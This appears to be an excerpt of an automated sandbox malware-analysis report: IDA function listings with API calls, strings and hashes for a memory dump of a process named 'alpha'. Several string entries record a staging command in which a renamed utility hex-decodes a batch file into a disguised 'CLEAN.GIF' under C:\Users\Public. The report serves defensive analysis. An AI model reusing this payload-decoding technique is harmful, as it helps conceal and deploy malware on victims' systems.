                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                              • String ID:
                                              • API String ID: 3829876242-3916222277
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                              • API String ID: 0-1950234451
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorLast$InformationVolume
                                              • String ID: %04X-%04X$~
                                              • API String ID: 2748242238-2468825380
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D884
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D89D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D94D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D964
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB17DB89
                                              • wcstol.MSVCRT ref: 00007FF6EB17DBDF
                                              • wcstol.MSVCRT ref: 00007FF6EB17DC63
                                              • memmove.MSVCRT ref: 00007FF6EB17DD33
                                              • memmove.MSVCRT ref: 00007FF6EB17DE9A
                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17DF1F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                              • String ID:
                                              • API String ID: 1051989028-0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                              • String ID: \\.\
                                              • API String ID: 799470305-2900601889
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1754DE
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17552B
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17554F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19345F
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB19347E
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934C3
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1934DB
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934FA
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                              • String ID:
                                              • API String ID: 1356649289-0
                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction ID: 025797300da41e52b255f845c3479cecd4e98ec701baa0ceef90b22512e442ca
                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction Fuzzy Hash: 74917033A0864297E6149F25F5043B9B6A1FB8EBA8F544135DA4E837B4DF3EE444CB09
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                              • String ID: :$\
                                              • API String ID: 3961617410-1166558509
                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction ID: 013a2b510f4e1a1cd9f999fca9265c15e42033a515d752337a67516eb43014be
                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction Fuzzy Hash: A7216023A0864286EB544B60A5442F9A6A1FB4FBACF448131D91FC37B0DF7DE4498A06
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 2516562204-381716982
                                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction ID: ba21f98d1b1ca0d6dd683a174fe03297bbbc71cd6dea17cfb0a1d73ae9ba05e4
                                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction Fuzzy Hash: 84C1BE33A0469286E7508F25E9403BE77A0FB49BA8F441139DE8D93BA8DF3DE454CB05
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                              • API String ID: 1580871199-2613899276
                                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction ID: cd36b768485b0d75adb9a13a70e9a23a1ecef2e1ee26173eb939aa9145c2887b
                                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction Fuzzy Hash: 19519373B18B8282EB108B15E4003B977A4FB8DBA8F455135DA9E87764DF3DE005CB49
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$EnvironmentVariable
                                              • String ID: DIRCMD
                                              • API String ID: 1405722092-1465291664
                                              • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction ID: 1814c9bce6caa3f5ae6518d7b5a2011b79cfb4f7d928d97b093ca57e0abb9750
                                              • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction Fuzzy Hash: 55816E73A18BD28AEB20CF60E8403ED77A5FB4A758F104139DA4D97B68DF38D1458B05
                                              APIs
                                              Similarity
                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                              • String ID:
                                              • API String ID: 3192234081-0
                                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction ID: e19ea9c48758fcf2ae5c322ec63986ad6d96848224a672fa183f3a8eaaffe353
                                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction Fuzzy Hash: 9D3188326086528BE7109F21F4047BDBB51FB8EBA8F449134DE4A977A5CF3DD4058B05
                                              APIs
                                              Strings
                                              • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 , xrefs: 00007FF6EB17E00B
                                              Similarity
                                              • API ID: Heap$FreeProcess_setjmp
                                              • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                              • API String ID: 777023205-853097648
                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction ID: cf36f06f133a62bc00b5ab22ec418b7a044bb8251ed11f02a5af64e0218fa24b
                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction Fuzzy Hash: 84512633A0DA52C5EA518B15F8903B8B6A4FF4DB6CF544436D90DC33B9DF7EA441860A
                                              APIs
                                              Similarity
                                              • API ID: memsetwcsspn
                                              • String ID:
                                              • API String ID: 3809306610-0
                                              • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction ID: a73a8792297089c6f666fa89e20f1ad291be07f4851f4fb20ae85c6dd45a969f
                                              • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction Fuzzy Hash: A8B1A163A08B4682EA518F15E4503F9B7A1FB4DBA8F848031DA4E877B4DF7EE441C746
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183514
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183522
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183541
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18355E
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Similarity
                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                              • String ID:
                                              • API String ID: 4057327938-0
                                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction ID: 2f04be6e58ce9f1ba0da8e5cdd16aa84c554af790e6b767bdcd8d6bf17a8d7df
                                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction Fuzzy Hash: 38317423F0CA4296E7559B15B5003FDB6A0FF8E768F584135EA4EC33B5DE2EE4098609
                                              APIs
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1971F9
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB19720D
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB197300
                                                • Part of subcall function 00007FF6EB195740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6EB1975C4,?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195744
                                              Strings
                                              Similarity
                                              • API ID: OpenSemaphore$CloseErrorHandleLast
                                              • String ID: _p0$wil
                                              • API String ID: 455305043-1814513734
                                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction ID: b95d8de379387da7ee697481f6f1b84c4455cffc913901586884205543c553e3
                                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction Fuzzy Hash: 0661A063B1878282EF258F6594103F963A1FF8CBA8F554431DA0E877A4EF3EE5048309
                                              APIs
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB199A10
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB199994
                                                • Part of subcall function 00007FF6EB19A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                                • Part of subcall function 00007FF6EB19A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                                • Part of subcall function 00007FF6EB19A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              • wcsrchr.MSVCRT ref: 00007FF6EB199A62
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                              • String ID: %s=%s$.
                                              • API String ID: 3242694432-4275322459
                                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction ID: 887d1c95fbf232c98831d07d289e631fbe34dc26afc138d7314acaa646b48ace
                                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction Fuzzy Hash: 7941AE23A0978286EA149B11A5503FA62A0FF8E7F8F444234DD5D873E5EE7EE445870A
                                              APIs
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1954E6
                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB19552E
                                                • Part of subcall function 00007FF6EB19758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975AE
                                                • Part of subcall function 00007FF6EB19758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateCurrentMutexProcess
                                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                                              • API String ID: 779401067-630742106
                                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction ID: d0c06a69acbce52fe55dd07fb9fec2443e9a3bfa5e98e2a942e682030011905c
                                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction Fuzzy Hash: A651A433A187C282EB219B11E4407FA6360FF8C7A8F404032EA4DDBA65DE3EE505C705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                              • API String ID: 3677997916-3870813718
                                              • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction ID: c45c1574d6486c540680004834c3663f3f6a7829e90f1c8e84cb4cb73e1d3d6c
                                              • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction Fuzzy Hash: 0411F876619A41C6EA108B50E4847AAF7A4FB8A768F404625DA8D437B8DF7ED048CB05
                                              APIs
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B4BD
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B518
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B58B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: ELSE$IF/?
                                              • API String ID: 3223794493-1134991328
                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction ID: 4ecfd639badb7d7c9692d92befbe87bbdc9cd53240eb31668fe209f301d186b0
                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction Fuzzy Hash: DE415823A0D66381FA549B24E4213FA26A1AF4E76CF585035DA0EC73F5DF7EE400874A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                              • String ID:
                                              • API String ID: 1532185241-0
                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction ID: d27f550a367c2a04a06cbe0a77a67fc87a523bd2846daf9e8267f1c8b28af7e7
                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
